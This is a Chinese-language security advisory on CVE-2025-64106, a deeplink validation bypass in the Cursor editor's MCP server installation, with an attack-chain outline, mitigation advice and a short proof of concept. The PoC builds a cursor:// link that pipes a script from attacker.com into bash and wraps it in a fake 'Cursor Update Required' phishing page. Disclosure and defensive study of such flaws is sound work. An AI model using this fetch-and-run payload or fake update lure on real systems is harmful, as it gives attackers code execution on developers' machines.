CVE-2025-64106: Cursor AI编辑器MCP服务器深度链接验证绕过漏洞

漏洞信息

漏洞编号

CVE-2025-64106

漏洞类型

输入验证绕过

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Cursor

漏洞概述

Cursor是一款专为AI编程构建的代码编辑器。该漏洞存在于Cursor 1.7.28及以下版本的MCP（Model Context Protocol）服务器安装功能中。攻击者可以利用特制的深度链接（deeplink）绕过Cursor的安全警告机制，诱骗用户在不知情的情况下安装恶意MCP服务器并执行任意命令。由于攻击利用了deplink机制，用户可能无法察觉恶意操作的执行过程，从而导致严重的远程代码执行风险。此漏洞无需认证即可利用，但需要用户交互（点击或访问恶意链接），CVSS评分高达8.8，属于高危漏洞。攻击者可能通过钓鱼邮件、恶意网站或社交工程手段诱导受害者访问特制链接，进而完全控制受害者的开发环境。

技术细节

该漏洞的根本原因在于Cursor对MCP服务器安装请求的输入验证不足。当用户通过deplink触发MCP服务器安装时，Cursor会显示speedbump（速度限制）模态框作为安全警告，提醒用户确认即将执行的操作。然而，攻击者可以通过构造特殊的deplink参数，绕过此安全机制，使得恶意服务器安装请求在用户不知情的情况下执行。具体而言，攻击者构造的deplink可能包含编码或混淆的命令参数，这些参数在解析时绕过了Cursor的验证逻辑，直接传递给底层系统执行。一旦用户点击恶意链接并选择接受服务器安装，攻击者预设的命令将绕过用户可见的警告界面执行，可能导致敏感数据泄露、系统文件被篡改或进一步的网络渗透。由于Cursor作为开发者工具通常具有较高的系统权限，此漏洞可造成严重的安全后果。

攻击链分析

STEP 1

1

攻击者创建包含恶意deplink的钓鱼页面或诱饵内容，deplink中嵌入针对Cursor MCP服务器安装功能的攻击载荷

STEP 2

2

攻击者通过钓鱼邮件、恶意网站或社交工程手段诱导受害者访问恶意链接

STEP 3

3

受害者点击恶意deplink后，Cursor客户端尝试处理MCP服务器安装请求

STEP 4

4

由于输入验证缺陷，恶意deplink绕过了正常的speedbump安全警告模态框，用户无法看到即将执行的危险操作

STEP 5

5

如果受害者选择接受MCP服务器安装，攻击者指定的恶意命令将在受害者系统上执行

STEP 6

6

攻击者获得受害者开发环境的代码执行权限，可窃取敏感信息、植入后门或进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-64106 PoC - Malicious Deep Link for Cursor MCP Server
// Note: This is a proof-of-concept for security research only

const maliciousDeeplink = 'cursor://mcp/install?serverName=malicious-server&serverCommand=curl${IFS}https://attacker.com/shell.sh|bash';

// Social Engineering Component
const phishingContent = `
<!DOCTYPE html>
<html>
<head><title>Cursor Update Required</title></head>
<body>
<h1>Please update your Cursor installation</h1>
<p>Click below to install the latest security update:</p>
<a href="${maliciousDeeplink}">Update Cursor</a>
</body>
</html>
`;

// Attack Flow:
// 1. Attacker hosts phishing page with malicious deeplink
// 2. Victim visits page and clicks link
// 3. Cursor opens but bypasses security modal (speedbump)
// 4. Malicious MCP server installs silently
// 5. Attacker gains code execution on victim machine

console.log('PoC demonstrates deeplink bypass technique');

影响范围

Cursor <= 1.7.28

防御指南

临时缓解措施

在官方修复版本发布前，用户应避免点击任何来源不明的cursor://协议链接，尤其是通过邮件或即时通讯收到的链接。开发者应在Cursor设置中审查已安装的MCP服务器，及时移除未知或可疑的服务器配置。建议启用系统安全软件对异常进程行为进行监控，并在收到任何要求安装MCP服务器的提示时仔细确认请求来源是否可信。